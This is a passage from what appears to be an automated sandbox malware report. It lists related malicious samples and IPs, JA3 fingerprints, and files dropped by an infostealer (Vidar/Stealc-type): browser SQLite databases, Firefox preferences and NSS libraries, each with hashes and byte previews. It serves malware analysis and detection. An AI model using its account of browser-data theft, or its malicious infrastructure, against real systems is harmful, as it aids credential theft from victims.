                                                              HETZNER-ASDEfile.exeGet hashmaliciousUnknownBrowse
                                                              • 5.75.211.162
                                                              g3V051umJf.htmlGet hashmaliciousUnknownBrowse
                                                              • 195.201.215.225
                                                              https://iskiosvillas.gr/booking/AAMAyYwBGAAAAAAB2B1ZmTNuNBwBbZXOiMVmgTZdxswVIV.htmlGet hashmaliciousUnknownBrowse
                                                              • 78.46.90.29
                                                              Contract_Agreement_Wednesday September 2024.pdfGet hashmaliciousUnknownBrowse
                                                              • 88.198.19.212
                                                              Z09QznvZSr.exeGet hashmaliciousUnknownBrowse
                                                              • 5.75.211.162
                                                              https://is.gd/fxcRirGet hashmaliciousUnknownBrowse
                                                              • 168.119.146.39
                                                              https://bostempek.vercel.app/Get hashmaliciousPorn ScamBrowse
                                                              • 136.243.69.157
                                                              https://312d5c44.flca.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                                              • 195.201.57.90
                                                              https://gkiqlhmli3lp80l.pages.dev/Get hashmaliciousUnknownBrowse
                                                              • 195.201.57.90
                                                              https://jm7lqhyjh4wb0gyyvrq.pages.dev/Get hashmaliciousUnknownBrowse
                                                              • 195.201.57.90

                                                              JA3 Fingerprints

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              51c64c77e60f3980eea90869b68c58a8file.exeGet hashmaliciousUnknownBrowse
                                                              • 5.75.211.162
                                                              Z09QznvZSr.exeGet hashmaliciousUnknownBrowse
                                                              • 5.75.211.162
                                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                                              • 5.75.211.162
                                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                                              • 5.75.211.162
                                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                                              • 5.75.211.162
                                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                              • 5.75.211.162
                                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                                              • 5.75.211.162
                                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                              • 5.75.211.162
                                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                              • 5.75.211.162
                                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                              • 5.75.211.162
                                                              37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousUnknownBrowse
                                                              • 104.102.49.254
                                                              • 172.105.54.160
                                                              e.dllGet hashmaliciousDridex DropperBrowse
                                                              • 104.102.49.254
                                                              • 172.105.54.160
                                                              e.dllGet hashmaliciousDridex DropperBrowse
                                                              • 104.102.49.254
                                                              • 172.105.54.160
                                                              Payment copy.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • 104.102.49.254
                                                              • 172.105.54.160
                                                              Z09QznvZSr.exeGet hashmaliciousUnknownBrowse
                                                              • 104.102.49.254
                                                              • 172.105.54.160
                                                              PERMINTAAN ANGGARAN (Universitas IPB) ID177888.vbeGet hashmaliciousGuLoader, LokibotBrowse
                                                              • 104.102.49.254
                                                              • 172.105.54.160
                                                              PersonalizedOffer.exeGet hashmaliciousUltraVNCBrowse
                                                              • 104.102.49.254
                                                              • 172.105.54.160
                                                              PersonalizedOffer.exeGet hashmaliciousUltraVNCBrowse
                                                              • 104.102.49.254
                                                              • 172.105.54.160
                                                              38sab1rT0H.exeGet hashmaliciousLatrodectusBrowse
                                                              • 104.102.49.254
                                                              • 172.105.54.160
                                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                                              • 104.102.49.254
                                                              • 172.105.54.160

                                                              Dropped Files

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              C:\ProgramData\freebl3.dllfile.exeGet hashmaliciousStealc, VidarBrowse
                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                      file.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog StealerBrowse
                                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                            file.exeGet hashmaliciousStealc, VidarBrowse
                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                  C:\ProgramData\mozglue.dllfile.exeGet hashmaliciousStealc, VidarBrowse
                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog StealerBrowse
                                                                                            file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                    file.exeGet hashmaliciousLummaC, VidarBrowse

                                                                                                      Created / dropped Files

                                                                                                      C:\ProgramData\DAEBKKKEHD.exe

                                                                                                      Download File
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):263908
                                                                                                      Entropy (8bit):7.998846488868232
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:3072:CEJhujqDU1ByHguzD/FN56N4UV9qMuoTfXzksKk+3AwMQmBbsvsuikkAlrweSdvG:CQuuGQX/FN5CVU03+wwybsDV3SdO
                                                                                                      MD5:21504B52DAA4C04B619A19E6EDC54CD1
                                                                                                      SHA1:5F4F51F69B964DE390ADB06822D25164B6B77958
                                                                                                      SHA-256:5F701B9AAD60C098DC1D36FC83C660D67FFF172A4DEDB3DE351506FA435B152D
                                                                                                      SHA-512:52A55DAEA6755C80A1AD0855E1F65179AC58DCD7739EC3B49079C90312548FF9169024B82B5AA6D2DCD82F1644955DBC22D4BDD874396EDA92D3D8AF01D8544F
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f............................>.... ........@.. ....................... ............`.....................................S.......................(&........................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H...........0............................................................M.b.K..K.9~h.w....G).2..X..u.........&...W...`.r..I.z-@..W....y...x..e...g.O....f.&..~.vV.\...yM<..V&..z..B.).....y..-....g.*E..!T9.z...M..."...A...#..V..kj#.2....)........:r...-9\..hK<....f3u.xX....T.....+Q:.......T....X.i.v7.....Q.9vq. .M.r0..}k.t5J!..1.e..U..;....;..z.9_Y.T3?k%..L.6M....;.P.5W.'0....V.T,9wl..y....]....sj:y..k.4.$.".o.9.V+.@Re3Y..(...:.K.O#..L..X%.u..`&.1&..X{.

                                                                                                      C:\ProgramData\GHIJJJEGDBFH\AAAAKJ

                                                                                                      Download File
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):106496
                                                                                                      Entropy (8bit):1.136413900497188
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                      Malicious:false
                                                                                                      Reputation:high, very likely benign file
                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\ProgramData\GHIJJJEGDBFH\BFBGCF

                                                                                                      Download File
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                      Category:dropped
                                                                                                      Size (bytes):20480
                                                                                                      Entropy (8bit):0.8439810553697228
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                      MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                      SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                      SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                      SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                      Malicious:false
                                                                                                      Reputation:high, very likely benign file
                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\ProgramData\GHIJJJEGDBFH\CAAKFI

                                                                                                      Download File
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):98304
                                                                                                      Entropy (8bit):0.08235737944063153
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                      Malicious:false
                                                                                                      Reputation:high, very likely benign file
                                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\ProgramData\GHIJJJEGDBFH\CAAKFI-shm

                                                                                                      Download File
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):32768
                                                                                                      Entropy (8bit):0.017262956703125623
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                      Malicious:false
                                                                                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\ProgramData\GHIJJJEGDBFH\CFHDBF

                                                                                                      Download File
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):9504
                                                                                                      Entropy (8bit):5.512408163813622
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
                                                                                                      MD5:1191AEB8EAFD5B2D5C29DF9B62C45278
                                                                                                      SHA1:584A8B78810AEE6008839EF3F1AC21FD5435B990
                                                                                                      SHA-256:0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
                                                                                                      SHA-512:86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
                                                                                                      Malicious:false
                                                                                                      Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                      C:\ProgramData\GHIJJJEGDBFH\DAEBKK

                                                                                                      Download File
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                      Category:dropped
                                                                                                      Size (bytes):51200
                                                                                                      Entropy (8bit):0.8746135976761988
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\ProgramData\GHIJJJEGDBFH\DAKJDH

                                                                                                      Download File
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                      Category:dropped
                                                                                                      Size (bytes):159744
                                                                                                      Entropy (8bit):0.5394293526345721
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                      MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                      SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                      SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                      SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\ProgramData\GHIJJJEGDBFH\EBKKKE

                                                                                                      Download File
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                      Category:dropped
                                                                                                      Size (bytes):5242880
                                                                                                      Entropy (8bit):0.03859996294213402
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                                                      MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                                                      SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                                                      SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                                                      SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\ProgramData\GHIJJJEGDBFH\EBKKKE-shm

                                                                                                      Download File
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):32768
                                                                                                      Entropy (8bit):0.017262956703125623
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                      Malicious:false
                                                                                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\ProgramData\GHIJJJEGDBFH\FCAAEB

                                                                                                      Download File
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                      Category:dropped
                                                                                                      Size (bytes):196608
                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\ProgramData\GHIJJJEGDBFH\HCGDGI

                                                                                                      Download File
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                      Category:dropped
                                                                                                      Size (bytes):155648
                                                                                                      Entropy (8bit):0.5407252242845243
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                      MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                      SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                      SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                      SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\ProgramData\GHIJJJEGDBFH\HJJJDA

                                                                                                      Download File
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                      Category:dropped
                                                                                                      Size (bytes):20480
                                                                                                      Entropy (8bit):0.6732424250451717
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\ProgramData\GHIJJJEGDBFH\JDGHII

                                                                                                      Download File
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                      Category:dropped
                                                                                                      Size (bytes):40960
                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\ProgramData\freebl3.dll

                                                                                                      Download File
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):685392
                                                                                                      Entropy (8bit):6.872871740790978
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                      MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                      SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                      SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                      SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Joe Sandbox View:
                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\ProgramData\mozglue.dll

                                                                                                      Download File
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):608080
                                                                                                      Entropy (8bit):6.833616094889818
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                      MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                      SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                      SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                      SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Joe Sandbox View:
                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\ProgramData\msvcp140.dll

                                                                                                      Download File
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):450024
                                                                                                      Entropy (8bit):6.673992339875127
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                      MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                      SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                      SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
